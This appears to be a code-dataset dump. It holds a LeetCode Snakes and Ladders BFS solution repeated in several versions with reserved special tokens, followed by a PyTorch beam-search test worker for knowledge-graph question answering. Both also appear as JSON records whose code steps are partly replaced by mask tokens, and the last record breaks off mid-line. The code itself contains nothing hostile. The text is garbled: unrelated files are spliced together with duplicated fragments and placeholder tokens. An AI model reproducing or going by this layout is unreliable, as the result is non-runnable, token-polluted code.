if new_node not in vis:
dq.append(new_node)
vis.add(new_node)
return -1
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from typing import List
class Solution:
def snakesAndLadders(self, board: List[List[int]]) ->int:
N = len(board)
def get_pos(num):
r = (num - 1) // N
c = (num - 1) % N
c = c if r + 1 & 1 else N - 1 - c
r = N - 1 - r
return r, c
def skip(num):
r, c = get_pos(num)
if board[r][c] != -1:
return board[r][c]
else:
return num
from collections import deque
dq = deque([1])
vis = set([1])
step = -1
while dq:
sz = len(dq)
step += 1
for _ in range(sz):
node = dq.popleft()
if node == N * N:
return step
for i in range(1, 7):
new_node = node + i
if new_node > N * N:
continue
new_node = skip(new_node)
if new_node not in vis:
dq.append(new_node)
vis.add(new_node)
return -1
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#
# @lc app=leetcode.cn id=909 lang=python3
#
# [909] 蛇梯棋
#
# @lc code=start
from typing import List
class Solution:
def snakesAndLadders(self, board: List[List[int]]) -> int:
N = len(board)
def get_pos(num):
r = (num-1) // N
c = (num-1) % N
c = c if ((r+1) & 1) else (N-1 - c)
r = N-1 - r
return r, c
# r, c = get_pos(20)
# print(r, c)
def skip(num):
r, c = get_pos(num)
if board[r][c] != -1:
return board[r][c]
else:
return num
from collections import deque
dq = deque([1])
vis = set([1])
step = -1
while dq:
sz = len(dq)
step += 1
for _ in range(sz):
node = dq.popleft()
if (node == N*N):
return step
for i in range(1, 7):
new_node = node + i
if (new_node > N*N):
continue
new_node = skip(new_node)
if (new_node not in vis):
dq.append(new_node)
vis.add(new_node)
return -1
""" 21-06-27 每日一题打卡BFS
Accepted
211/211 cases passed (100 ms)
Your runtime beats 99.08 % of python3 submissions
Your memory usage beats 14.68 % of python3 submissions (15.1 MB)
"""
# board = [[-1,-1,-1,-1,-1,-1],
# [-1,-1,-1,-1,-1,-1],
# [-1,-1,-1,-1,-1,-1],
# [-1,35,-1,-1,13,-1],
# [-1,-1,-1,-1,-1,-1],
# [-1,15,-1,-1,-1,-1]]
# s = Solution().snakesAndLadders(board)
# print(s)
# @lc code=end
|
flexible
|
{
"blob_id": "da5a366d1cc4f192a220dc38c7a74aeb3fba7cdb",
"index": 9839,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def snakesAndLadders(self, board: List[List[int]]) ->int:\n N = len(board)\n\n def get_pos(num):\n r = (num - 1) // N\n c = (num - 1) % N\n c = c if r + 1 & 1 else N - 1 - c\n r = N - 1 - r\n return r, c\n\n def skip(num):\n r, c = get_pos(num)\n if board[r][c] != -1:\n return board[r][c]\n else:\n return num\n from collections import deque\n dq = deque([1])\n vis = set([1])\n step = -1\n while dq:\n sz = len(dq)\n step += 1\n for _ in range(sz):\n node = dq.popleft()\n if node == N * N:\n return step\n for i in range(1, 7):\n new_node = node + i\n if new_node > N * N:\n continue\n new_node = skip(new_node)\n if new_node not in vis:\n dq.append(new_node)\n vis.add(new_node)\n return -1\n\n\n<mask token>\n",
"step-4": "from typing import List\n\n\nclass Solution:\n\n def snakesAndLadders(self, board: List[List[int]]) ->int:\n N = len(board)\n\n def get_pos(num):\n r = (num - 1) // N\n c = (num - 1) % N\n c = c if r + 1 & 1 else N - 1 - c\n r = N - 1 - r\n return r, c\n\n def skip(num):\n r, c = get_pos(num)\n if board[r][c] != -1:\n return board[r][c]\n else:\n return num\n from collections import deque\n dq = deque([1])\n vis = set([1])\n step = -1\n while dq:\n sz = len(dq)\n step += 1\n for _ in range(sz):\n node = dq.popleft()\n if node == N * N:\n return step\n for i in range(1, 7):\n new_node = node + i\n if new_node > N * N:\n continue\n new_node = skip(new_node)\n if new_node not in vis:\n dq.append(new_node)\n vis.add(new_node)\n return -1\n\n\n<mask token>\n",
"step-5": "#\n# @lc app=leetcode.cn id=909 lang=python3\n#\n# [909] 蛇梯棋\n#\n\n# @lc code=start\nfrom typing import List\nclass Solution:\n def snakesAndLadders(self, board: List[List[int]]) -> int:\n N = len(board)\n def get_pos(num):\n r = (num-1) // N\n c = (num-1) % N\n c = c if ((r+1) & 1) else (N-1 - c) \n r = N-1 - r\n return r, c\n # r, c = get_pos(20)\n # print(r, c)\n def skip(num):\n r, c = get_pos(num)\n if board[r][c] != -1:\n return board[r][c]\n else:\n return num\n from collections import deque\n dq = deque([1])\n vis = set([1])\n step = -1\n while dq:\n sz = len(dq)\n step += 1\n for _ in range(sz):\n node = dq.popleft()\n if (node == N*N):\n return step\n for i in range(1, 7):\n new_node = node + i\n if (new_node > N*N):\n continue\n new_node = skip(new_node)\n if (new_node not in vis):\n dq.append(new_node)\n vis.add(new_node)\n\n return -1\n\n\"\"\" 21-06-27 每日一题打卡BFS\nAccepted\n211/211 cases passed (100 ms)\nYour runtime beats 99.08 % of python3 submissions\nYour memory usage beats 14.68 % of python3 submissions (15.1 MB)\n\"\"\"\n\n# board = [[-1,-1,-1,-1,-1,-1],\n# [-1,-1,-1,-1,-1,-1],\n# [-1,-1,-1,-1,-1,-1],\n# [-1,35,-1,-1,13,-1],\n# [-1,-1,-1,-1,-1,-1],\n# [-1,15,-1,-1,-1,-1]]\n\n# s = Solution().snakesAndLadders(board)\n# print(s)\n\n# @lc code=end\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import torch
import torch.nn as nn
from tqdm import tqdm
import torch.nn.functional as F
import torch.multiprocessing as mp
from policy_network import Policy_Network
from util import safe_log
from util import index2word, rearrange_vector_list, get_num_gpus, set_seed
class TestWorker(mp.Process):
def __init__(self, args, worker_id, env, d_entity_neighours, d_entity2bucketid, d_action_space_buckets, d_entity2id, d_relation2id, reqa_checkpoint_path, d_results, word_num, entity_num, relation_num, keqa_checkpoint_path, return_trace = False):
super().__init__(name='test-worker-%02d' % (worker_id))
self.args = args
self.seed = args.seed + worker_id
self.fix_batch_size = args.batch_size
self.use_keqa_vector = args.use_keqa_vector
self.max_hop = args.max_hop
self.beam_size = args.beam_size
self.return_trace = return_trace
self.d_entity_neighours = d_entity_neighours
self.d_entity2bucketid = d_entity2bucketid
self.d_action_space_buckets = d_action_space_buckets
self.id2entity = index2word(d_entity2id)
self.id2relation = index2word(d_relation2id)
self.worker_id = worker_id
self.gpu_id = self.worker_id % get_num_gpus()
self.env = env
self.d_results = d_results
self.reqa_checkpoint_path = reqa_checkpoint_path
self.word_num = word_num
self.entity_num = entity_num
self.relation_num = relation_num
self.keqa_checkpoint_path = keqa_checkpoint_path
def run(self):
set_seed(self.seed)
self.model = Policy_Network(self.args, self.word_num, self.entity_num, self.relation_num, self.keqa_checkpoint_path, self.gpu_id)
self.model.load(self.reqa_checkpoint_path)
self.model.cuda(self.gpu_id)
self.model.eval()
self.env.set_model(self.model)
self.env.set_gpu_id(self.gpu_id)
total_data_num = len(self.env.d_dataset)
hits_1_num = 0
with torch.no_grad():
for example_id in tqdm(range(0, len(self.env.d_dataset), self.fix_batch_size), desc=self.name, position=self.worker_id):
idx = range(example_id, example_id + self.fix_batch_size)
self.env.reset(idx)
self.batch_size = self.env.batch_size
batch_hits1 = self.rollout()
hits_1_num += batch_hits1
hits_1_result = 1.0 * hits_1_num / total_data_num
self.d_results['hits@1'] = hits_1_result
def rollout(self):
batch_question, batch_question_len, batch_head, batch_answers = self.env.return_batch_data()
if self.return_trace:
l_search_trace = []
l_log_action_probs = []
batch_pred_vector = None
if self.use_keqa_vector:
batch_pred_vector = self.model.get_anticipated_entity_vector(batch_head, batch_question, batch_question_len, self.d_entity_neighours)
log_action_prob = torch.zeros(self.batch_size).cuda(self.gpu_id)
for t in range(self.max_hop):
path_trace, path_hidden = self.env.observe()
last_r, e_t = path_trace[-1]
batch_path_hidden = path_hidden[-1][0][-1, :, :]
k = int(e_t.size()[0] / self.batch_size)
beam_question = batch_question.unsqueeze(1).repeat(1, k, 1).view(self.batch_size * k, -1)
beam_question_len = batch_question_len.unsqueeze(1).repeat(1, k).view(self.batch_size * k)
beam_pred_vector = None
if self.use_keqa_vector:
beam_pred_vector = batch_pred_vector.unsqueeze(1).repeat(1, k, 1).view(self.batch_size * k, -1)
db_outcomes, _, _, inv_offset = self.model.transit(t, e_t, beam_question, beam_question_len, batch_path_hidden, self.d_entity2bucketid, self.d_action_space_buckets, last_r, False, beam_pred_vector)
db_action_spaces = [action_space for action_space, _ in db_outcomes]
db_action_dist = [action_dist for _, action_dist in db_outcomes]
action_space = self.pad_and_cat_action_space(db_action_spaces, inv_offset)
action_dist = self.pad_and_cat(db_action_dist, padding_value=0)[inv_offset]
log_action_dist = log_action_prob.view(-1, 1) + safe_log(action_dist)
if self.return_trace:
print(t)
print(last_r, e_t)
print("----")
print(action_space[0])
print(F.softmax(log_action_dist.view(-1)).view(self.batch_size * k, -1))
print("------------------------")
if t == self.max_hop - 1:
action, log_action_prob, action_offset = self.top_k_answer_unique(log_action_dist, action_space)
else:
action, log_action_prob, action_offset = self.top_k_action(log_action_dist, action_space)
path_list, (h_t, c_t) = self.model.update_path(action, path_hidden, offset = action_offset)
self.env.step(action, path_list, (h_t, c_t))
if self.return_trace:
rearrange_vector_list(l_log_action_probs, action_offset)
l_log_action_probs.append(log_action_prob)
self.adjust_search_trace(l_search_trace, action_offset)
l_search_trace.append(action)
batch_pred_e2 = action[1].view(self.batch_size, -1)
batch_pred_e2_top1 = batch_pred_e2[:, 0].view(self.batch_size, -1)
batch_hits1 = torch.sum(torch.gather(batch_answers, 1, batch_pred_e2_top1).view(-1)).item()
if self.return_trace:
self.print_search_trace(batch_head, l_search_trace, l_log_action_probs)
return batch_hits1
def top_k_action(self, log_action_dist, action_space):
full_size = len(log_action_dist)
last_k = int(full_size / self.batch_size)
(r_space, e_space), _ = action_space
action_space_size = r_space.size()[1]
log_action_dist = log_action_dist.view(self.batch_size, -1)
beam_action_space_size = log_action_dist.size()[1]
k = min(self.beam_size, beam_action_space_size)
log_action_prob, action_ind = torch.topk(log_action_dist, k)
next_r = torch.gather(r_space.view(self.batch_size, -1), 1, action_ind).view(-1)
next_e = torch.gather(e_space.view(self.batch_size, -1), 1, action_ind).view(-1)
log_action_prob = log_action_prob.view(-1)
action_beam_offset = action_ind // action_space_size
action_batch_offset = (torch.arange(self.batch_size).cuda(self.gpu_id) * last_k).unsqueeze(1)
action_offset = (action_batch_offset + action_beam_offset).view(-1)
return (next_r, next_e), log_action_prob, action_offset
def top_k_answer_unique(self, log_action_dist, action_space):
full_size = len(log_action_dist)
last_k = int(full_size / self.batch_size)
(r_space, e_space), _ = action_space
action_space_size = r_space.size()[1]
r_space = r_space.view(self.batch_size, -1)
e_space = e_space.view(self.batch_size, -1)
log_action_dist = log_action_dist.view(self.batch_size, -1)
beam_action_space_size = log_action_dist.size()[1]
k = min(self.beam_size, beam_action_space_size)
next_r_list, next_e_list = [], []
log_action_prob_list = []
action_offset_list = []
for i in range(self.batch_size):
log_action_dist_b = log_action_dist[i]
r_space_b = r_space[i]
e_space_b = e_space[i]
unique_e_space_b = torch.unique(e_space_b.data.cpu()).cuda(self.gpu_id)
unique_log_action_dist, unique_idx = self.unique_max(unique_e_space_b, e_space_b, log_action_dist_b)
k_prime = min(len(unique_e_space_b), k)
top_unique_log_action_dist, top_unique_idx2 = torch.topk(unique_log_action_dist, k_prime)
top_unique_idx = unique_idx[top_unique_idx2]
top_unique_beam_offset = top_unique_idx // action_space_size
top_r = r_space_b[top_unique_idx]
top_e = e_space_b[top_unique_idx]
next_r_list.append(top_r.unsqueeze(0))
next_e_list.append(top_e.unsqueeze(0))
log_action_prob_list.append(top_unique_log_action_dist.unsqueeze(0))
top_unique_batch_offset = i * last_k
top_unique_action_offset = top_unique_batch_offset + top_unique_beam_offset
action_offset_list.append(top_unique_action_offset.unsqueeze(0))
next_r = self.pad_and_cat(next_r_list, padding_value=0).view(-1)
next_e = self.pad_and_cat(next_e_list, padding_value=0).view(-1)
log_action_prob = self.pad_and_cat(log_action_prob_list, padding_value = -float("inf"))
action_offset = self.pad_and_cat(action_offset_list, padding_value=-1)
return (next_r, next_e), log_action_prob.view(-1), action_offset.view(-1)
def sync_model(self):
self.model.load_state_dict(self.shared_model.state_dict())
def pad_and_cat_action_space(self, action_spaces, inv_offset):
db_r_space, db_e_space, db_action_mask = [], [], []
for (r_space, e_space), action_mask in action_spaces:
db_r_space.append(r_space)
db_e_space.append(e_space)
db_action_mask.append(action_mask)
r_space = self.pad_and_cat(db_r_space, padding_value=0)[inv_offset]
e_space = self.pad_and_cat(db_e_space, padding_value=0)[inv_offset]
action_mask = self.pad_and_cat(db_action_mask, padding_value=0)[inv_offset]
action_space = ((r_space, e_space), action_mask)
return action_space
def pad_and_cat(self, a, padding_value, padding_dim=1):
max_dim_size = max([x.size()[padding_dim] for x in a])
padded_a = []
for x in a:
if x.size()[padding_dim] < max_dim_size:
res_len = max_dim_size - x.size()[1]
pad = nn.ConstantPad1d((0, res_len), padding_value)
padded_a.append(pad(x))
else:
padded_a.append(x)
return torch.cat(padded_a, dim=0).cuda(self.gpu_id)
def unique_max(self, unique_x, x, values, marker_2D=None):
unique_interval = 100
HUGE_INT = 1e31
unique_values, unique_indices = [], []
for i in range(0, len(unique_x), unique_interval):
unique_x_b = unique_x[i:i+unique_interval]
marker_2D = (unique_x_b.unsqueeze(1) == x.unsqueeze(0)).float()
values_2D = marker_2D * values.unsqueeze(0) - (1 - marker_2D) * HUGE_INT
unique_values_b, unique_idx_b = values_2D.max(dim=1)
unique_values.append(unique_values_b)
unique_indices.append(unique_idx_b)
unique_values = torch.cat(unique_values).cuda(self.gpu_id)
unique_idx = torch.cat(unique_indices).cuda(self.gpu_id)
return unique_values, unique_idx
def adjust_search_trace(self, search_trace, action_offset):
for i, (r, e) in enumerate(search_trace):
new_r = r[action_offset]
new_e = e[action_offset]
search_trace[i] = (new_r, new_e)
def print_search_trace(self, batch_head, l_search_trace, l_log_action_probs):
for i in range(self.batch_size):
top_k_edge_labels = []
for k, log_action_prob in enumerate(l_log_action_probs):
beam_size = len(log_action_prob)
for j in range(beam_size):
ind = i * beam_size + j
r = self.id2relation[int(l_search_trace[k][0][ind])]
e = self.id2entity[int(l_search_trace[k][1][ind])]
if r.endswith('_inverse'):
edge_label = '<-{}-{} {}'.format(r[:-8], e, float(log_action_prob[ind]))
else:
edge_label = '-{}->{} {}'.format(r, e, float(log_action_prob[ind]))
if k == 0:
edge_label = self.id2entity[int(batch_head[i])] + edge_label
top_k_edge_labels.append(edge_label)
else:
top_k_edge_labels[j] += edge_label
for i, edge_label in enumerate(top_k_edge_labels):
print(i, edge_label)
print("*****************************")
|
normal
|
{
"blob_id": "c7333d838b87d4c275d9dbb6d7e3047c313b4bc0",
"index": 9212,
"step-1": "<mask token>\n\n\nclass TestWorker(mp.Process):\n <mask token>\n <mask token>\n\n def rollout(self):\n batch_question, batch_question_len, batch_head, batch_answers = (self\n .env.return_batch_data())\n if self.return_trace:\n l_search_trace = []\n l_log_action_probs = []\n batch_pred_vector = None\n if self.use_keqa_vector:\n batch_pred_vector = self.model.get_anticipated_entity_vector(\n batch_head, batch_question, batch_question_len, self.\n d_entity_neighours)\n log_action_prob = torch.zeros(self.batch_size).cuda(self.gpu_id)\n for t in range(self.max_hop):\n path_trace, path_hidden = self.env.observe()\n last_r, e_t = path_trace[-1]\n batch_path_hidden = path_hidden[-1][0][-1, :, :]\n k = int(e_t.size()[0] / self.batch_size)\n beam_question = batch_question.unsqueeze(1).repeat(1, k, 1).view(\n self.batch_size * k, -1)\n beam_question_len = batch_question_len.unsqueeze(1).repeat(1, k\n ).view(self.batch_size * k)\n beam_pred_vector = None\n if self.use_keqa_vector:\n beam_pred_vector = batch_pred_vector.unsqueeze(1).repeat(1,\n k, 1).view(self.batch_size * k, -1)\n db_outcomes, _, _, inv_offset = self.model.transit(t, e_t,\n beam_question, beam_question_len, batch_path_hidden, self.\n d_entity2bucketid, self.d_action_space_buckets, last_r, \n False, beam_pred_vector)\n db_action_spaces = [action_space for action_space, _ in db_outcomes\n ]\n db_action_dist = [action_dist for _, action_dist in db_outcomes]\n action_space = self.pad_and_cat_action_space(db_action_spaces,\n inv_offset)\n action_dist = self.pad_and_cat(db_action_dist, padding_value=0)[\n inv_offset]\n log_action_dist = log_action_prob.view(-1, 1) + safe_log(\n action_dist)\n if self.return_trace:\n print(t)\n print(last_r, e_t)\n print('----')\n print(action_space[0])\n print(F.softmax(log_action_dist.view(-1)).view(self.\n batch_size * k, -1))\n print('------------------------')\n if t == self.max_hop - 1:\n action, log_action_prob, action_offset = (self.\n top_k_answer_unique(log_action_dist, action_space))\n else:\n action, log_action_prob, action_offset = self.top_k_action(\n log_action_dist, action_space)\n path_list, (h_t, c_t) = self.model.update_path(action,\n path_hidden, offset=action_offset)\n self.env.step(action, path_list, (h_t, c_t))\n if self.return_trace:\n rearrange_vector_list(l_log_action_probs, action_offset)\n l_log_action_probs.append(log_action_prob)\n self.adjust_search_trace(l_search_trace, action_offset)\n l_search_trace.append(action)\n batch_pred_e2 = action[1].view(self.batch_size, -1)\n batch_pred_e2_top1 = batch_pred_e2[:, 0].view(self.batch_size, -1)\n batch_hits1 = torch.sum(torch.gather(batch_answers, 1,\n batch_pred_e2_top1).view(-1)).item()\n if self.return_trace:\n self.print_search_trace(batch_head, l_search_trace,\n l_log_action_probs)\n return batch_hits1\n\n def top_k_action(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size)\n log_action_prob, action_ind = torch.topk(log_action_dist, k)\n next_r = torch.gather(r_space.view(self.batch_size, -1), 1, action_ind\n ).view(-1)\n next_e = torch.gather(e_space.view(self.batch_size, -1), 1, action_ind\n ).view(-1)\n log_action_prob = log_action_prob.view(-1)\n action_beam_offset = action_ind // action_space_size\n action_batch_offset = (torch.arange(self.batch_size).cuda(self.\n gpu_id) * last_k).unsqueeze(1)\n action_offset = (action_batch_offset + action_beam_offset).view(-1)\n return (next_r, next_e), log_action_prob, action_offset\n\n def top_k_answer_unique(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n r_space = r_space.view(self.batch_size, -1)\n e_space = e_space.view(self.batch_size, -1)\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size)\n next_r_list, next_e_list = [], []\n log_action_prob_list = []\n action_offset_list = []\n for i in range(self.batch_size):\n log_action_dist_b = log_action_dist[i]\n r_space_b = r_space[i]\n e_space_b = e_space[i]\n unique_e_space_b = torch.unique(e_space_b.data.cpu()).cuda(self\n .gpu_id)\n unique_log_action_dist, unique_idx = self.unique_max(\n unique_e_space_b, e_space_b, log_action_dist_b)\n k_prime = min(len(unique_e_space_b), k)\n top_unique_log_action_dist, top_unique_idx2 = torch.topk(\n unique_log_action_dist, k_prime)\n top_unique_idx = unique_idx[top_unique_idx2]\n top_unique_beam_offset = top_unique_idx // action_space_size\n top_r = r_space_b[top_unique_idx]\n top_e = e_space_b[top_unique_idx]\n next_r_list.append(top_r.unsqueeze(0))\n next_e_list.append(top_e.unsqueeze(0))\n log_action_prob_list.append(top_unique_log_action_dist.unsqueeze(0)\n )\n top_unique_batch_offset = i * last_k\n top_unique_action_offset = (top_unique_batch_offset +\n top_unique_beam_offset)\n action_offset_list.append(top_unique_action_offset.unsqueeze(0))\n next_r = self.pad_and_cat(next_r_list, padding_value=0).view(-1)\n next_e = self.pad_and_cat(next_e_list, padding_value=0).view(-1)\n log_action_prob = self.pad_and_cat(log_action_prob_list,\n padding_value=-float('inf'))\n action_offset = self.pad_and_cat(action_offset_list, padding_value=-1)\n return (next_r, next_e), log_action_prob.view(-1), action_offset.view(\n -1)\n\n def sync_model(self):\n self.model.load_state_dict(self.shared_model.state_dict())\n\n def pad_and_cat_action_space(self, action_spaces, inv_offset):\n db_r_space, db_e_space, db_action_mask = [], [], []\n for (r_space, e_space), action_mask in action_spaces:\n db_r_space.append(r_space)\n db_e_space.append(e_space)\n db_action_mask.append(action_mask)\n r_space = self.pad_and_cat(db_r_space, padding_value=0)[inv_offset]\n e_space = self.pad_and_cat(db_e_space, padding_value=0)[inv_offset]\n action_mask = self.pad_and_cat(db_action_mask, padding_value=0)[\n inv_offset]\n action_space = (r_space, e_space), action_mask\n return action_space\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestWorker(mp.Process):\n <mask token>\n\n def run(self):\n set_seed(self.seed)\n self.model = Policy_Network(self.args, self.word_num, self.\n entity_num, self.relation_num, self.keqa_checkpoint_path, self.\n gpu_id)\n self.model.load(self.reqa_checkpoint_path)\n self.model.cuda(self.gpu_id)\n self.model.eval()\n self.env.set_model(self.model)\n self.env.set_gpu_id(self.gpu_id)\n total_data_num = len(self.env.d_dataset)\n hits_1_num = 0\n with torch.no_grad():\n for example_id in tqdm(range(0, len(self.env.d_dataset), self.\n fix_batch_size), desc=self.name, position=self.worker_id):\n idx = range(example_id, example_id + self.fix_batch_size)\n self.env.reset(idx)\n self.batch_size = self.env.batch_size\n batch_hits1 = self.rollout()\n hits_1_num += batch_hits1\n hits_1_result = 1.0 * hits_1_num / total_data_num\n self.d_results['hits@1'] = hits_1_result\n\n def rollout(self):\n batch_question, batch_question_len, batch_head, batch_answers = (self\n .env.return_batch_data())\n if self.return_trace:\n l_search_trace = []\n l_log_action_probs = []\n batch_pred_vector = None\n if self.use_keqa_vector:\n batch_pred_vector = self.model.get_anticipated_entity_vector(\n batch_head, batch_question, batch_question_len, self.\n d_entity_neighours)\n log_action_prob = torch.zeros(self.batch_size).cuda(self.gpu_id)\n for t in range(self.max_hop):\n path_trace, path_hidden = self.env.observe()\n last_r, e_t = path_trace[-1]\n batch_path_hidden = path_hidden[-1][0][-1, :, :]\n k = int(e_t.size()[0] / self.batch_size)\n beam_question = batch_question.unsqueeze(1).repeat(1, k, 1).view(\n self.batch_size * k, -1)\n beam_question_len = batch_question_len.unsqueeze(1).repeat(1, k\n ).view(self.batch_size * k)\n beam_pred_vector = None\n if self.use_keqa_vector:\n beam_pred_vector = batch_pred_vector.unsqueeze(1).repeat(1,\n k, 1).view(self.batch_size * k, -1)\n db_outcomes, _, _, inv_offset = self.model.transit(t, e_t,\n beam_question, beam_question_len, batch_path_hidden, self.\n d_entity2bucketid, self.d_action_space_buckets, last_r, \n False, beam_pred_vector)\n db_action_spaces = [action_space for action_space, _ in db_outcomes\n ]\n db_action_dist = [action_dist for _, action_dist in db_outcomes]\n action_space = self.pad_and_cat_action_space(db_action_spaces,\n inv_offset)\n action_dist = self.pad_and_cat(db_action_dist, padding_value=0)[\n inv_offset]\n log_action_dist = log_action_prob.view(-1, 1) + safe_log(\n action_dist)\n if self.return_trace:\n print(t)\n print(last_r, e_t)\n print('----')\n print(action_space[0])\n print(F.softmax(log_action_dist.view(-1)).view(self.\n batch_size * k, -1))\n print('------------------------')\n if t == self.max_hop - 1:\n action, log_action_prob, action_offset = (self.\n top_k_answer_unique(log_action_dist, action_space))\n else:\n action, log_action_prob, action_offset = self.top_k_action(\n log_action_dist, action_space)\n path_list, (h_t, c_t) = self.model.update_path(action,\n path_hidden, offset=action_offset)\n self.env.step(action, path_list, (h_t, c_t))\n if self.return_trace:\n rearrange_vector_list(l_log_action_probs, action_offset)\n l_log_action_probs.append(log_action_prob)\n self.adjust_search_trace(l_search_trace, action_offset)\n l_search_trace.append(action)\n batch_pred_e2 = action[1].view(self.batch_size, -1)\n batch_pred_e2_top1 = batch_pred_e2[:, 0].view(self.batch_size, -1)\n batch_hits1 = torch.sum(torch.gather(batch_answers, 1,\n batch_pred_e2_top1).view(-1)).item()\n if self.return_trace:\n self.print_search_trace(batch_head, l_search_trace,\n l_log_action_probs)\n return batch_hits1\n\n def top_k_action(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size)\n log_action_prob, action_ind = torch.topk(log_action_dist, k)\n next_r = torch.gather(r_space.view(self.batch_size, -1), 1, action_ind\n ).view(-1)\n next_e = torch.gather(e_space.view(self.batch_size, -1), 1, action_ind\n ).view(-1)\n log_action_prob = log_action_prob.view(-1)\n action_beam_offset = action_ind // action_space_size\n action_batch_offset = (torch.arange(self.batch_size).cuda(self.\n gpu_id) * last_k).unsqueeze(1)\n action_offset = (action_batch_offset + action_beam_offset).view(-1)\n return (next_r, next_e), log_action_prob, action_offset\n\n def top_k_answer_unique(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n r_space = r_space.view(self.batch_size, -1)\n e_space = e_space.view(self.batch_size, -1)\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size)\n next_r_list, next_e_list = [], []\n log_action_prob_list = []\n action_offset_list = []\n for i in range(self.batch_size):\n log_action_dist_b = log_action_dist[i]\n r_space_b = r_space[i]\n e_space_b = e_space[i]\n unique_e_space_b = torch.unique(e_space_b.data.cpu()).cuda(self\n .gpu_id)\n unique_log_action_dist, unique_idx = self.unique_max(\n unique_e_space_b, e_space_b, log_action_dist_b)\n k_prime = min(len(unique_e_space_b), k)\n top_unique_log_action_dist, top_unique_idx2 = torch.topk(\n unique_log_action_dist, k_prime)\n top_unique_idx = unique_idx[top_unique_idx2]\n top_unique_beam_offset = top_unique_idx // action_space_size\n top_r = r_space_b[top_unique_idx]\n top_e = e_space_b[top_unique_idx]\n next_r_list.append(top_r.unsqueeze(0))\n next_e_list.append(top_e.unsqueeze(0))\n log_action_prob_list.append(top_unique_log_action_dist.unsqueeze(0)\n )\n top_unique_batch_offset = i * last_k\n top_unique_action_offset = (top_unique_batch_offset +\n top_unique_beam_offset)\n action_offset_list.append(top_unique_action_offset.unsqueeze(0))\n next_r = self.pad_and_cat(next_r_list, padding_value=0).view(-1)\n next_e = self.pad_and_cat(next_e_list, padding_value=0).view(-1)\n log_action_prob = self.pad_and_cat(log_action_prob_list,\n padding_value=-float('inf'))\n action_offset = self.pad_and_cat(action_offset_list, padding_value=-1)\n return (next_r, next_e), log_action_prob.view(-1), action_offset.view(\n -1)\n\n def sync_model(self):\n self.model.load_state_dict(self.shared_model.state_dict())\n\n def pad_and_cat_action_space(self, action_spaces, inv_offset):\n db_r_space, db_e_space, db_action_mask = [], [], []\n for (r_space, e_space), action_mask in action_spaces:\n db_r_space.append(r_space)\n db_e_space.append(e_space)\n db_action_mask.append(action_mask)\n r_space = self.pad_and_cat(db_r_space, padding_value=0)[inv_offset]\n e_space = self.pad_and_cat(db_e_space, padding_value=0)[inv_offset]\n action_mask = self.pad_and_cat(db_action_mask, padding_value=0)[\n inv_offset]\n action_space = (r_space, e_space), action_mask\n return action_space\n <mask token>\n\n def unique_max(self, unique_x, x, values, marker_2D=None):\n unique_interval = 100\n HUGE_INT = 1e+31\n unique_values, unique_indices = [], []\n for i in range(0, len(unique_x), unique_interval):\n unique_x_b = unique_x[i:i + unique_interval]\n marker_2D = (unique_x_b.unsqueeze(1) == x.unsqueeze(0)).float()\n values_2D = marker_2D * values.unsqueeze(0) - (1 - marker_2D\n ) * HUGE_INT\n unique_values_b, unique_idx_b = values_2D.max(dim=1)\n unique_values.append(unique_values_b)\n unique_indices.append(unique_idx_b)\n unique_values = torch.cat(unique_values).cuda(self.gpu_id)\n unique_idx = torch.cat(unique_indices).cuda(self.gpu_id)\n return unique_values, unique_idx\n\n def adjust_search_trace(self, search_trace, action_offset):\n for i, (r, e) in enumerate(search_trace):\n new_r = r[action_offset]\n new_e = e[action_offset]\n search_trace[i] = new_r, new_e\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass TestWorker(mp.Process):\n <mask token>\n\n def run(self):\n set_seed(self.seed)\n self.model = Policy_Network(self.args, self.word_num, self.\n entity_num, self.relation_num, self.keqa_checkpoint_path, self.\n gpu_id)\n self.model.load(self.reqa_checkpoint_path)\n self.model.cuda(self.gpu_id)\n self.model.eval()\n self.env.set_model(self.model)\n self.env.set_gpu_id(self.gpu_id)\n total_data_num = len(self.env.d_dataset)\n hits_1_num = 0\n with torch.no_grad():\n for example_id in tqdm(range(0, len(self.env.d_dataset), self.\n fix_batch_size), desc=self.name, position=self.worker_id):\n idx = range(example_id, example_id + self.fix_batch_size)\n self.env.reset(idx)\n self.batch_size = self.env.batch_size\n batch_hits1 = self.rollout()\n hits_1_num += batch_hits1\n hits_1_result = 1.0 * hits_1_num / total_data_num\n self.d_results['hits@1'] = hits_1_result\n\n def rollout(self):\n batch_question, batch_question_len, batch_head, batch_answers = (self\n .env.return_batch_data())\n if self.return_trace:\n l_search_trace = []\n l_log_action_probs = []\n batch_pred_vector = None\n if self.use_keqa_vector:\n batch_pred_vector = self.model.get_anticipated_entity_vector(\n batch_head, batch_question, batch_question_len, self.\n d_entity_neighours)\n log_action_prob = torch.zeros(self.batch_size).cuda(self.gpu_id)\n for t in range(self.max_hop):\n path_trace, path_hidden = self.env.observe()\n last_r, e_t = path_trace[-1]\n batch_path_hidden = path_hidden[-1][0][-1, :, :]\n k = int(e_t.size()[0] / self.batch_size)\n beam_question = 